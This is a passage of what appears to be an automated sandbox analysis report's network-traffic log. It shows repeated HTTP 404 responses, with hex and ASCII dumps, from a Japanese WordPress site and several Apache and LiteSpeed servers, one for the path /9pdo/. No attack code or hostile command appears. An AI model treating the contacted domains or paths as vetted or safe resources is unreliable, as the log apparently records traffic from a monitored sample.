20 49 45 5d 3e 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 2d 62 65 6e 72 69 79 61 30 30 32 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 6a 73 74 6f 72 6b 2f 6e 2d 66 61 63 74 6f 72 79 2d 63 73 73 2f 66 6f 6f 74 65 72 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 2d 62 65 6e 72 69 79 61 30 30 32 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 6a 73 74 6f 72 6b 2f 6e 2d 66 61 63 74 6f 72 79 2d 63 73 73 2f 70 61 67 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0a 0a 0a 09 09 3c 21 2d 2d 20 41 6c 6c 20 69 6e 20 4f 6e 65 20 53 45 4f 20 34 2e 35 2e 33 2e 31 20 2d 20 61 69 6f 73 65 6f 2e 63 6f 6d 20 2d 2d 3e 0d 0a 09 09 3c 74 69 74 6c 65 3e 20 20 e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f 20 7c 20 e7 89 87 e4 bb 98 e3 81 91 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 7
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 03 May 2024 18:26:52 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://n-benriya002.com/wp-json/>; rel="https://api.w.org/"Data Raw: 35 66 39 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 6a 61 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 48 61 6e 64 68 65 6c 64 46 72 69 65 6e 64 6c 79 22 20 63 6f 6e 74 65 6e 74 3d 22 54 72 75 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4d 6f 62 69 6c 65 4f 70 74 69 6d 69 7a 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 33 32 30 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 0a 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 2d 62 65 6e 72 69 79 61 30 30 32 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 0a 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 2d 62 65 6e 72 69 79 61 30 30 32 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 6a 73 74 6f 72 6b 2f 6e 2d 66 61 63 74 6f 72 79 2d 63 73 73 2f 66 6f 6f 74 65 72 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 2d 62 65 6e 72 69 79 61 30 30 32 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 6a 73 74 6f 72 6b 2f 6e 2d 66 61 63 74 6f 72 79 2d 63 73 73 2f 70 61 67 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0a 0a 0a 09 09 3c 21 2d 2d 20 41 6c 6c 20 69 6e 20 4f 6e 65 20 53 45 4f 20 34 2e 35 2e 33 2e 31 20 2d 20 61 69 6f 73 65 6f 2e 63 6f 6d 20 2d 2d 3e 0d 0a 09 09 3c 74 69 74 6c 65 3e 20 20 e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f 20 7c 20 e7 89 87 e4 bb 98 e3 81 91 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 7
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 18:27:00 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 70 64 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /9pdo/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 18:27:03 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 70 64 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /9pdo/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 18:27:05 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 70 64 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /9pdo/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 18:27:08 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 70 64 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /9pdo/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 18:27:14 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 18:27:16 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 18:27:19 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 18:27:22 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Fri, 03 May 2024 18:27:42 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Fri, 03 May 2024 18:27:44 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 